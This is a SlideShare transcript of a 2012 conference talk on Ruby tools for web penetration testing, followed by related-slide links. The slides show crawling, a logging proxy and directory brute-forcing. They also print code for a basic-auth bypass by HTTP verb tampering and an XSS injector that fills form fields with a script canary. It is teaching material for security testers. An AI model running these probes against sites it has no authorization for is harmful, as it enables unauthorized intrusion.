SlideShare a Scribd company logo

Picking gem ruby for penetration testers

Download as KEY, PDF
Paolo Perego
Paolo Perego
TechnologyDesign
1 of 32
picks and gems: ruby for penetration @thesp0nge
self.inspect https://github.com/thesp0nge @thesp0nge http://armoredcode.com
Why ruby? • API • networking • string manipulation • Net::HTTP • Coolness 3
Disclaimer Attack only sites you’re authorized to 4
What to test? class Developer class Developer # a bunch of great include # methods here Person::Attacker end # a plenty of great # methods here end Change your mindset. You’re an attacker now! 5
What to test? Your app is a black box You must class Developer gather informations include about it Person::Attacker # a plenty of great You don’t have # methods here credentials end Ooh look... a web form... RubyDay IT, Milan, 15 June 6 2012
Leverage your attack surface “It’s my web application. I don’t even promote it. I have all the informations about it, what are you talking about?” Deep knowledge of the underlying technology Spot attack entrypoints Check transport layer security Check for the service door RubyDay IT, Milan, 15 June 7 2012
Leverage your attack surface robots.t to discover xt to fingerprint RubyDay IT, Milan, 15 June 8 2012
Leverage your attack surface $ gem install links $ links -r http://www.yourtarget.com # TESTING: SPIDERS, ROBOTS, AND CRAWLERS (OWASP-IG-001) def self.robots(site, only_disallow=true) if (! site.start_with? 'http://') and (! site.start_with? 'https://') site = 'http://'+site end list = [] begin res=Net::HTTP.get_response(URI(site+'/robots.txt')) if (res.code != "200") return [] end “Just a bunch of ruby loc res.body.split("n").each do |line| away...” if only_disallow if (line.downcase.start_with?('disallow')) list << line.split(":")[1].strip.chomp end else if (line.downcase.start_with?('allow') or line.downcase.start_with?('disallow')) list << line.split(":")[1].strip.chomp end end end rescue return [] end list end RubyDay IT, Milan, 15 June 9 2012
Demo 10
• Search engines crawl your site they are polite, you can ask not to do it • Attackers crawl your site... they are not polite. $ gem install anemone require 'anemone' Anemone.crawl("http://www.target.com/") do |anemone| anemone.on_every_page do |page| puts page.url end end 11 event name
Demo 12
Build a transparent Sometimes you need to observe the requests your browser makes while using a website... async calls are so sweets... $ gem install casper Useful to check $ casper javascripts or urls called on going... while manual browsing your target site RubyDay IT, Milan, 15 June 13 2012
Build a transparent module Casper class Proxy < WEBrick::HTTPProxyServer attr_reader :req_count attr_reader :hosts Extending def initialize(config={}) @req_count = 0 @hosts=[] WEBRick config[:Port] ||= 8080 config[:AccessLog] = [] config[:ProxyContentHandler] = Proc.new do |req, res| log_requests(req, res) end super(config) end private def log_requests(req, res) $stdout.puts "[#{Time.now}] #{req.request_line.chomp}n" if @hosts.index(req.host).nil? @hosts << req.host end Make the business inc_req_count end def inc_req_count @req_count += 1 end RubyDay IT, Milan, 15 June 14 2012
Demo 15
enchant: brute force discovery Very intrusive attack... discover web directories using brute force. You’ll be busted $ gem install enchant $ enchant http://www.yourtarget.com RubyDay IT, Milan, 15 June 16 2012
Demo 17
Web Application fingerpring Web servers answer to the same HTTP request in different way. GET / HTTP/1.0 HTTP/1.1 200 OK Date: Sun, 15 Jun 2003 17:10: 49 GMT HTTP/1.1 200 OK Server: Apache/1.3.23 Server: Microsoft-IIS/5.0 Last-Modified: Thu, 27 Feb 2003 03:48: 19 GMT Content-Location: http://iis.example.com/Default.htm ETag: 32417-c4-3e5d8a83 Date: Fri, 01 Jan 1999 20:13: 52 GMT Accept-Ranges: bytes Content-Type: text/HTML Content-Length: 196 Accept-Ranges: bytes Connection: close Last-Modified: Fri, 01 Jan 1999 20:13: 52 GMT Content-Type: text/HTML ETag: W/e0d362a4c335be1: ae1 Content-Length: 133 http://code.google.com/p/ webapplicationfingerprinter/ RubyDay IT, Milan, 15 June 18 2012
SSL Testing Evaluate an SSL connection for: • protocols the server supports • cipher length • certificate key length $ gem install ciphersurfer $ ciphersurfer www.gmail.com Evaluating secure communication with www.gmail.com:443 Overall evaluation : B (76.5) Protocol support : ooooooooooooooooooooooooooooooooooooooooooooooooooooooo (55) Key exchange : oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo (80) Cipher strength : oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo (90) RubyDay IT, Milan, 15 June 19 2012
SSL Testing protocol_version.each do |version| s = Ciphersurfer::Scanner.new({:host=>host, :port=>port, :proto=>version}) s.go if (s.ok_ciphers.size != 0) supported_protocols << version cipher_bits = cipher_bits | s.ok_bits def go ciphers = ciphers | s.ok_ciphers context=OpenSSL::SSL::SSLContext.new(@proto) end cipher_set = context.ciphers cipher_set.each do |cipher_name, cipher_version, bits, algorithm_bits| end request = Net::HTTP.new(@host, @port) request.use_ssl = true request.verify_mode = OpenSSL::SSL::VERIFY_NONE request.ciphers= cipher_name begin response = request.get("/") @ok_bits << bits @ok_ciphers << cipher_name rescue OpenSSL::SSL::SSLError => e # Quietly discard SSLErrors, really I don't care if the cipher has # not been accepted rescue # Quietly discard all other errors... you must perform all error # chekcs in the calling program end end end RubyDay IT, Milan, 15 June 20 2012
Demo 21
Check for backup Crawl the web site and append file extension to your GETs require 'anemone' require 'httpclient' h=HTTPClient.new() Anemone.crawl(ARGV[0]) do |anemone| anemone.on_every_page do |page| response = h.get(page.url) puts "Original: #{page.url}: #{response.code}" response = h.get(page.url.to_s.split(";")[0].concat(".bak")) puts "BAK: #{page.url.to_s.split(";")[0].concat(".bak")}: #{response.code}" response = h.get(page.url.to_s.split(";")[0].concat(".old")) puts "OLD: #{page.url.to_s.split(";")[0].concat(".old")}: #{response.code}" response = h.get(page.url.to_s.split(";")[0].concat("~")) puts "~: #{page.url.to_s.split(";")[0].concat("~")}: #{response.code}" end end RubyDay IT, Milan, 15 June 22 2012
Demo 23
Bypass A case study for a PHP 5.3 application using basic auth: with a tampered HTTP verb you can access to protected urls require 'net/http' Create a custom HTTP class Dammi < Net::HTTPRequest METHOD="DAMMI" verb REQUEST_HAS_BODY = false RESPONSE_HAS_BODY = true end http=Net::HTTP.new('www.mytarget.nonexistent', 80) r_a = http.request(Dammi.new("/backend/index.php")) Make the request puts r_a.body RubyDay IT, Milan, 15 June 24 2012
Cross site scripting Executing arbitrary javascript code at client site by submitting a crafted parameter on a web form RubyDay IT, Milan, 15 June 25 2012
Cross site scripting $ gem install cross $ cross http://www.yourtarget.com module Cross # Engine is the cross class using Mechanize to inject canary and check for # output class Engine include Singleton attr_reader :agent # Starts the engine def start @agent = Mechanize.new {|a| a.log = Logger.new("cross.log")} @agent.user_agent_alias = 'Mac Safari' end def inject(url) found = false page = @agent.get(url) page.forms.each do |f| f.fields.each do |ff| ff.value = "<script>alert('cross canary');</script>" end pp = @agent.submit(f) scripts = pp.search("//script") scripts.each do |sc| if sc.children.text == "alert('cross canary');" found = true end end end found end end end RubyDay IT, Milan, 15 June 26 2012
Cross site scripting #!/usr/bin/env ruby $LOAD_PATH.unshift(File.expand_path(File.dirname(__FILE__) + '/../lib')) require 'mechanize' require 'ap' require 'logger' require 'cross' host = Cross::Host.new(ARGV[0]) ap "cross " + Cross::Version.version[:string] + " (C) 2011 - thesp0nge" ap "target: " + host.host engine = Cross::Engine.instance engine.start if engine.inject(ARGV[0]) ap "Canary found in output page. Suspected XSS" end It doesn’t work with iframe apps :-( RubyDay IT, Milan, 15 June 27 2012
Demo 28
What we learnt • Don’t trust your users • “Security through obscurity” is EVIL • Testing for security issues is a mandatory step before deploy • HTTPS won’t safe from XSS or SQL Injections 29
Some links before we http://armoredcode.com/blog/categories/pentest- with-ruby/ https://gist.github.com/2935464 for anemone crawling demo) (gist https://github.com/thesp0nge/links https://github.com/thesp0nge/ ciphersurfer https://github.com/thesp0nge/enchant https://github.com/thesp0nge/cross http://www.owasp.org http://ronin-ruby.github.com/ https://github.com/rapid7/metasploit-framework RubyDay IT, Milan, 15 June 30 2012
Questions? 31 event name
Thank you! 32 event name

Recommended

Ruby on Rails Penetration Testing
Ruby on Rails Penetration TestingRuby on Rails Penetration Testing
Ruby on Rails Penetration Testing3S Labs
 
Security Goodness with Ruby on Rails
Security Goodness with Ruby on RailsSecurity Goodness with Ruby on Rails
Security Goodness with Ruby on RailsSource Conference
 
Ruby on Rails 101 - Presentation Slides for a Five Day Introductory Course
Ruby on Rails 101 - Presentation Slides for a Five Day Introductory CourseRuby on Rails 101 - Presentation Slides for a Five Day Introductory Course
Ruby on Rails 101 - Presentation Slides for a Five Day Introductory Coursepeter_marklund
 
Ruby On Grape
Ruby On GrapeRuby On Grape
Ruby On GrapeAndrii Furmanets
 
Building RESTful APIs w/ Grape
Building RESTful APIs w/ GrapeBuilding RESTful APIs w/ Grape
Building RESTful APIs w/ GrapeDaniel Doubrovkine
 
O que há de novo no Rails 3
O que há de novo no Rails 3O que há de novo no Rails 3
O que há de novo no Rails 3Hugo Baraúna
 
Ror Seminar With agilebd.org on 23 Jan09
Ror Seminar With agilebd.org on 23 Jan09Ror Seminar With agilebd.org on 23 Jan09
Ror Seminar With agilebd.org on 23 Jan09Shaer Hassan
 
Aci programmability
Aci programmabilityAci programmability
Aci programmabilityCisco DevNet
 

Recommended

Ruby on Rails Penetration Testing
Ruby on Rails Penetration TestingRuby on Rails Penetration Testing
Ruby on Rails Penetration Testing3S Labs
 
Security Goodness with Ruby on Rails
Security Goodness with Ruby on RailsSecurity Goodness with Ruby on Rails
Security Goodness with Ruby on RailsSource Conference
 
Ruby on Rails 101 - Presentation Slides for a Five Day Introductory Course
Ruby on Rails 101 - Presentation Slides for a Five Day Introductory CourseRuby on Rails 101 - Presentation Slides for a Five Day Introductory Course
Ruby on Rails 101 - Presentation Slides for a Five Day Introductory Coursepeter_marklund
 
Ruby On Grape
Ruby On GrapeRuby On Grape
Ruby On GrapeAndrii Furmanets
 
Building RESTful APIs w/ Grape
Building RESTful APIs w/ GrapeBuilding RESTful APIs w/ Grape
Building RESTful APIs w/ GrapeDaniel Doubrovkine
 
O que há de novo no Rails 3
O que há de novo no Rails 3O que há de novo no Rails 3
O que há de novo no Rails 3Hugo Baraúna
 
Ror Seminar With agilebd.org on 23 Jan09
Ror Seminar With agilebd.org on 23 Jan09Ror Seminar With agilebd.org on 23 Jan09
Ror Seminar With agilebd.org on 23 Jan09Shaer Hassan
 
Aci programmability
Aci programmabilityAci programmability
Aci programmabilityCisco DevNet
 
Building web framework with Rack
Building web framework with RackBuilding web framework with Rack
Building web framework with Racksickill
 
FITC - Here Be Dragons: Advanced JavaScript Debugging
FITC - Here Be Dragons: Advanced JavaScript DebuggingFITC - Here Be Dragons: Advanced JavaScript Debugging
FITC - Here Be Dragons: Advanced JavaScript DebuggingRami Sayar
 
Building an API using Grape
Building an API using GrapeBuilding an API using Grape
Building an API using Grapevisnu priya
 
Introduction to Ruby on Rails
Introduction to Ruby on RailsIntroduction to Ruby on Rails
Introduction to Ruby on RailsAgnieszka Figiel
 
Ruby on Rails workshop for beginner
Ruby on Rails workshop for beginnerRuby on Rails workshop for beginner
Ruby on Rails workshop for beginnerUmair Amjad
 
Developing Modern Java Web Applications with Java EE 7 and AngularJS
Developing Modern Java Web Applications with Java EE 7 and AngularJSDeveloping Modern Java Web Applications with Java EE 7 and AngularJS
Developing Modern Java Web Applications with Java EE 7 and AngularJSShekhar Gulati
 
A Toda Maquina Con Ruby on Rails
A Toda Maquina Con Ruby on RailsA Toda Maquina Con Ruby on Rails
A Toda Maquina Con Ruby on RailsRafael García
 
Composable and streamable Play apps
Composable and streamable Play appsComposable and streamable Play apps
Composable and streamable Play appsYevgeniy Brikman
 
RESTful API development in Laravel 4 - Christopher Pecoraro
RESTful API development in Laravel 4 - Christopher PecoraroRESTful API development in Laravel 4 - Christopher Pecoraro
RESTful API development in Laravel 4 - Christopher PecoraroChristopher Pecoraro
 
How to dockerize rails application compose and rails tutorial
How to dockerize rails application compose and rails tutorialHow to dockerize rails application compose and rails tutorial
How to dockerize rails application compose and rails tutorialKaty Slemon
 
Web a Quebec - JS Debugging
Web a Quebec - JS DebuggingWeb a Quebec - JS Debugging
Web a Quebec - JS DebuggingRami Sayar
 
Intro to Laravel
Intro to LaravelIntro to Laravel
Intro to LaravelAzukisoft Pte Ltd
 
Ruby on Rails All Hands Meeting
Ruby on Rails All Hands MeetingRuby on Rails All Hands Meeting
Ruby on Rails All Hands MeetingDan Davis
 
Microservices with Spring Boot
Microservices with Spring BootMicroservices with Spring Boot
Microservices with Spring BootJoshua Long
 
Scalable Django Architecture
Scalable Django ArchitectureScalable Django Architecture
Scalable Django ArchitectureRami Sayar
 
Aspdotnet
AspdotnetAspdotnet
AspdotnetAdil Jafri
 
Building Better Web APIs with Rails
Building Better Web APIs with RailsBuilding Better Web APIs with Rails
Building Better Web APIs with RailsAll Things Open
 
Apache Groovy's Metaprogramming Options and You
Apache Groovy's Metaprogramming Options and YouApache Groovy's Metaprogramming Options and You
Apache Groovy's Metaprogramming Options and YouAndres Almiray
 
10 Laravel packages everyone should know
10 Laravel packages everyone should know10 Laravel packages everyone should know
10 Laravel packages everyone should knowPovilas Korop
 
Rest api titouan benoit
Rest api titouan benoitRest api titouan benoit
Rest api titouan benoitTitouan BENOIT
 
Connecting the Worlds of Java and Ruby with JRuby
Connecting the Worlds of Java and Ruby with JRubyConnecting the Worlds of Java and Ruby with JRuby
Connecting the Worlds of Java and Ruby with JRubyNick Sieger
 
Rails web api 开发
Rails web api 开发Rails web api 开发
Rails web api 开发shaokun
 

More Related Content

What's hot

Building web framework with Rack
Building web framework with RackBuilding web framework with Rack
Building web framework with Racksickill
 
FITC - Here Be Dragons: Advanced JavaScript Debugging
FITC - Here Be Dragons: Advanced JavaScript DebuggingFITC - Here Be Dragons: Advanced JavaScript Debugging
FITC - Here Be Dragons: Advanced JavaScript DebuggingRami Sayar
 
Building an API using Grape
Building an API using GrapeBuilding an API using Grape
Building an API using Grapevisnu priya
 
Introduction to Ruby on Rails
Introduction to Ruby on RailsIntroduction to Ruby on Rails
Introduction to Ruby on RailsAgnieszka Figiel
 
Ruby on Rails workshop for beginner
Ruby on Rails workshop for beginnerRuby on Rails workshop for beginner
Ruby on Rails workshop for beginnerUmair Amjad
 
Developing Modern Java Web Applications with Java EE 7 and AngularJS
Developing Modern Java Web Applications with Java EE 7 and AngularJSDeveloping Modern Java Web Applications with Java EE 7 and AngularJS
Developing Modern Java Web Applications with Java EE 7 and AngularJSShekhar Gulati
 
A Toda Maquina Con Ruby on Rails
A Toda Maquina Con Ruby on RailsA Toda Maquina Con Ruby on Rails
A Toda Maquina Con Ruby on RailsRafael García
 
Composable and streamable Play apps
Composable and streamable Play appsComposable and streamable Play apps
Composable and streamable Play appsYevgeniy Brikman
 
RESTful API development in Laravel 4 - Christopher Pecoraro
RESTful API development in Laravel 4 - Christopher PecoraroRESTful API development in Laravel 4 - Christopher Pecoraro
RESTful API development in Laravel 4 - Christopher PecoraroChristopher Pecoraro
 
How to dockerize rails application compose and rails tutorial
How to dockerize rails application compose and rails tutorialHow to dockerize rails application compose and rails tutorial
How to dockerize rails application compose and rails tutorialKaty Slemon
 
Web a Quebec - JS Debugging
Web a Quebec - JS DebuggingWeb a Quebec - JS Debugging
Web a Quebec - JS DebuggingRami Sayar
 
Ruby on Rails All Hands Meeting
Ruby on Rails All Hands MeetingRuby on Rails All Hands Meeting
Ruby on Rails All Hands MeetingDan Davis
 
Microservices with Spring Boot
Microservices with Spring BootMicroservices with Spring Boot
Microservices with Spring BootJoshua Long
 
Scalable Django Architecture
Scalable Django ArchitectureScalable Django Architecture
Scalable Django ArchitectureRami Sayar
 
Building Better Web APIs with Rails
Building Better Web APIs with RailsBuilding Better Web APIs with Rails
Building Better Web APIs with RailsAll Things Open
 
Apache Groovy's Metaprogramming Options and You
Apache Groovy's Metaprogramming Options and YouApache Groovy's Metaprogramming Options and You
Apache Groovy's Metaprogramming Options and YouAndres Almiray
 
10 Laravel packages everyone should know
10 Laravel packages everyone should know10 Laravel packages everyone should know
10 Laravel packages everyone should knowPovilas Korop
 
Rest api titouan benoit
Rest api titouan benoitRest api titouan benoit
Rest api titouan benoitTitouan BENOIT
 

What's hot (20)

Building web framework with Rack
Building web framework with RackBuilding web framework with Rack
Building web framework with Rack
 
FITC - Here Be Dragons: Advanced JavaScript Debugging
FITC - Here Be Dragons: Advanced JavaScript DebuggingFITC - Here Be Dragons: Advanced JavaScript Debugging
FITC - Here Be Dragons: Advanced JavaScript Debugging
 
Building an API using Grape
Building an API using GrapeBuilding an API using Grape
Building an API using Grape
 
Introduction to Ruby on Rails
Introduction to Ruby on RailsIntroduction to Ruby on Rails
Introduction to Ruby on Rails
 
Ruby on Rails workshop for beginner
Ruby on Rails workshop for beginnerRuby on Rails workshop for beginner
Ruby on Rails workshop for beginner
 
Developing Modern Java Web Applications with Java EE 7 and AngularJS
Developing Modern Java Web Applications with Java EE 7 and AngularJSDeveloping Modern Java Web Applications with Java EE 7 and AngularJS
Developing Modern Java Web Applications with Java EE 7 and AngularJS
 
A Toda Maquina Con Ruby on Rails
A Toda Maquina Con Ruby on RailsA Toda Maquina Con Ruby on Rails
A Toda Maquina Con Ruby on Rails
 
Composable and streamable Play apps
Composable and streamable Play appsComposable and streamable Play apps
Composable and streamable Play apps
 
RESTful API development in Laravel 4 - Christopher Pecoraro
RESTful API development in Laravel 4 - Christopher PecoraroRESTful API development in Laravel 4 - Christopher Pecoraro
RESTful API development in Laravel 4 - Christopher Pecoraro
 
How to dockerize rails application compose and rails tutorial
How to dockerize rails application compose and rails tutorialHow to dockerize rails application compose and rails tutorial
How to dockerize rails application compose and rails tutorial
 
Web a Quebec - JS Debugging
Web a Quebec - JS DebuggingWeb a Quebec - JS Debugging
Web a Quebec - JS Debugging
 
Intro to Laravel
Intro to LaravelIntro to Laravel
Intro to Laravel
 
Ruby on Rails All Hands Meeting
Ruby on Rails All Hands MeetingRuby on Rails All Hands Meeting
Ruby on Rails All Hands Meeting
 
Microservices with Spring Boot
Microservices with Spring BootMicroservices with Spring Boot
Microservices with Spring Boot
 
Scalable Django Architecture
Scalable Django ArchitectureScalable Django Architecture
Scalable Django Architecture
 
Aspdotnet
AspdotnetAspdotnet
Aspdotnet
 
Building Better Web APIs with Rails
Building Better Web APIs with RailsBuilding Better Web APIs with Rails
Building Better Web APIs with Rails
 
Apache Groovy's Metaprogramming Options and You
Apache Groovy's Metaprogramming Options and YouApache Groovy's Metaprogramming Options and You
Apache Groovy's Metaprogramming Options and You
 
10 Laravel packages everyone should know
10 Laravel packages everyone should know10 Laravel packages everyone should know
10 Laravel packages everyone should know
 
Rest api titouan benoit
Rest api titouan benoitRest api titouan benoit
Rest api titouan benoit
 

Similar to Picking gem ruby for penetration testers

Connecting the Worlds of Java and Ruby with JRuby
Connecting the Worlds of Java and Ruby with JRubyConnecting the Worlds of Java and Ruby with JRuby
Connecting the Worlds of Java and Ruby with JRubyNick Sieger
 
Rails web api 开发
Rails web api 开发Rails web api 开发
Rails web api 开发shaokun
 
Ruby on Rails survival guide of an aged Java developer
Ruby on Rails survival guide of an aged Java developerRuby on Rails survival guide of an aged Java developer
Ruby on Rails survival guide of an aged Java developergicappa
 
Why Nodejs Guilin Shanghai
Why Nodejs Guilin ShanghaiWhy Nodejs Guilin Shanghai
Why Nodejs Guilin ShanghaiJackson Tian
 
Why Node.js
Why Node.jsWhy Node.js
Why Node.jsguileen
 
JRuby + Rails = Awesome Java Web Framework at Jfokus 2011
JRuby + Rails = Awesome Java Web Framework at Jfokus 2011JRuby + Rails = Awesome Java Web Framework at Jfokus 2011
JRuby + Rails = Awesome Java Web Framework at Jfokus 2011Nick Sieger
 
Crossing the Bridge: Connecting Rails and your Front-end Framework
Crossing the Bridge: Connecting Rails and your Front-end FrameworkCrossing the Bridge: Connecting Rails and your Front-end Framework
Crossing the Bridge: Connecting Rails and your Front-end FrameworkDaniel Spector
 
RubyEnRails2007 - Dr Nic Williams - Keynote
RubyEnRails2007 - Dr Nic Williams - KeynoteRubyEnRails2007 - Dr Nic Williams - Keynote
RubyEnRails2007 - Dr Nic Williams - KeynoteDr Nic Williams
 
Psgi Plack Sfpm
Psgi Plack SfpmPsgi Plack Sfpm
Psgi Plack Sfpmsom_nangia
 
Psgi Plack Sfpm
Psgi Plack SfpmPsgi Plack Sfpm
Psgi Plack Sfpmwilburlo
 
From Ruby to Node.js
From Ruby to Node.jsFrom Ruby to Node.js
From Ruby to Node.jsjubilem
 
Building native Android applications with Mirah and Pindah
Building native Android applications with Mirah and PindahBuilding native Android applications with Mirah and Pindah
Building native Android applications with Mirah and PindahNick Plante
 
Adventurous Merb
Adventurous MerbAdventurous Merb
Adventurous MerbMatt Todd
 

Similar to Picking gem ruby for penetration testers (20)

Connecting the Worlds of Java and Ruby with JRuby
Connecting the Worlds of Java and Ruby with JRubyConnecting the Worlds of Java and Ruby with JRuby
Connecting the Worlds of Java and Ruby with JRuby
 
Rails web api 开发
Rails web api 开发Rails web api 开发
Rails web api 开发
 
The Joy Of Ruby
The Joy Of RubyThe Joy Of Ruby
The Joy Of Ruby
 
Ruby on Rails survival guide of an aged Java developer
Ruby on Rails survival guide of an aged Java developerRuby on Rails survival guide of an aged Java developer
Ruby on Rails survival guide of an aged Java developer
 
Why Nodejs Guilin Shanghai
Why Nodejs Guilin ShanghaiWhy Nodejs Guilin Shanghai
Why Nodejs Guilin Shanghai
 
Why Node.js
Why Node.jsWhy Node.js
Why Node.js
 
JRuby + Rails = Awesome Java Web Framework at Jfokus 2011
JRuby + Rails = Awesome Java Web Framework at Jfokus 2011JRuby + Rails = Awesome Java Web Framework at Jfokus 2011
JRuby + Rails = Awesome Java Web Framework at Jfokus 2011
 
Ruby on Rails Presentation
Ruby on Rails PresentationRuby on Rails Presentation
Ruby on Rails Presentation
 
Crossing the Bridge: Connecting Rails and your Front-end Framework
Crossing the Bridge: Connecting Rails and your Front-end FrameworkCrossing the Bridge: Connecting Rails and your Front-end Framework
Crossing the Bridge: Connecting Rails and your Front-end Framework
 
RubyEnRails2007 - Dr Nic Williams - Keynote
RubyEnRails2007 - Dr Nic Williams - KeynoteRubyEnRails2007 - Dr Nic Williams - Keynote
RubyEnRails2007 - Dr Nic Williams - Keynote
 
From dot net_to_rails
From dot net_to_railsFrom dot net_to_rails
From dot net_to_rails
 
Psgi Plack Sfpm
Psgi Plack SfpmPsgi Plack Sfpm
Psgi Plack Sfpm
 
Psgi Plack Sfpm
Psgi Plack SfpmPsgi Plack Sfpm
Psgi Plack Sfpm
 
From Ruby to Node.js
From Ruby to Node.jsFrom Ruby to Node.js
From Ruby to Node.js
 
Building native Android applications with Mirah and Pindah
Building native Android applications with Mirah and PindahBuilding native Android applications with Mirah and Pindah
Building native Android applications with Mirah and Pindah
 
Intro to PSGI and Plack
Intro to PSGI and PlackIntro to PSGI and Plack
Intro to PSGI and Plack
 
Node azure
Node azureNode azure
Node azure
 
Adventurous Merb
Adventurous MerbAdventurous Merb
Adventurous Merb
 
Road to Rails
Road to RailsRoad to Rails
Road to Rails
 
Sinatra for REST services
Sinatra for REST servicesSinatra for REST services
Sinatra for REST services
 

More from Paolo Perego

20220603_pperego_openSUSE conference.pdf
20220603_pperego_openSUSE conference.pdf20220603_pperego_openSUSE conference.pdf
20220603_pperego_openSUSE conference.pdfPaolo Perego
 
Cosa c'è che non va? - Viaggio verso il nirvana del SSDLC
Cosa c'è che non va? - Viaggio verso il nirvana del SSDLCCosa c'è che non va? - Viaggio verso il nirvana del SSDLC
Cosa c'è che non va? - Viaggio verso il nirvana del SSDLCPaolo Perego
 
Put yourself in the #appsec pipeline
Put yourself in the #appsec pipelinePut yourself in the #appsec pipeline
Put yourself in the #appsec pipelinePaolo Perego
 
I tool owasp per la sicurezza del software 20110315
I tool owasp per la sicurezza del software 20110315I tool owasp per la sicurezza del software 20110315
I tool owasp per la sicurezza del software 20110315Paolo Perego
 
Sicurezza Applicatica Dalla Teoria Alla Pratica
Sicurezza Applicatica Dalla Teoria Alla PraticaSicurezza Applicatica Dalla Teoria Alla Pratica
Sicurezza Applicatica Dalla Teoria Alla PraticaPaolo Perego
 
Road towards Owasp Orizon 2.0 (November 2009 update)
Road towards Owasp Orizon 2.0 (November 2009 update)Road towards Owasp Orizon 2.0 (November 2009 update)
Road towards Owasp Orizon 2.0 (November 2009 update)Paolo Perego
 
The Art Of Code Reviewing
The Art Of Code ReviewingThe Art Of Code Reviewing
The Art Of Code ReviewingPaolo Perego
 
Owasp Orizon New Static Analysis In Hi Fi
Owasp Orizon New Static Analysis In Hi FiOwasp Orizon New Static Analysis In Hi Fi
Owasp Orizon New Static Analysis In Hi FiPaolo Perego
 

More from Paolo Perego (8)

20220603_pperego_openSUSE conference.pdf
20220603_pperego_openSUSE conference.pdf20220603_pperego_openSUSE conference.pdf
20220603_pperego_openSUSE conference.pdf
 
Cosa c'è che non va? - Viaggio verso il nirvana del SSDLC
Cosa c'è che non va? - Viaggio verso il nirvana del SSDLCCosa c'è che non va? - Viaggio verso il nirvana del SSDLC
Cosa c'è che non va? - Viaggio verso il nirvana del SSDLC
 
Put yourself in the #appsec pipeline
Put yourself in the #appsec pipelinePut yourself in the #appsec pipeline
Put yourself in the #appsec pipeline
 
I tool owasp per la sicurezza del software 20110315
I tool owasp per la sicurezza del software 20110315I tool owasp per la sicurezza del software 20110315
I tool owasp per la sicurezza del software 20110315
 
Sicurezza Applicatica Dalla Teoria Alla Pratica
Sicurezza Applicatica Dalla Teoria Alla PraticaSicurezza Applicatica Dalla Teoria Alla Pratica
Sicurezza Applicatica Dalla Teoria Alla Pratica
 
Road towards Owasp Orizon 2.0 (November 2009 update)
Road towards Owasp Orizon 2.0 (November 2009 update)Road towards Owasp Orizon 2.0 (November 2009 update)
Road towards Owasp Orizon 2.0 (November 2009 update)
 
The Art Of Code Reviewing
The Art Of Code ReviewingThe Art Of Code Reviewing
The Art Of Code Reviewing
 
Owasp Orizon New Static Analysis In Hi Fi
Owasp Orizon New Static Analysis In Hi FiOwasp Orizon New Static Analysis In Hi Fi
Owasp Orizon New Static Analysis In Hi Fi
 

Recently uploaded

Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
CloudStudio User manual (basic edition):
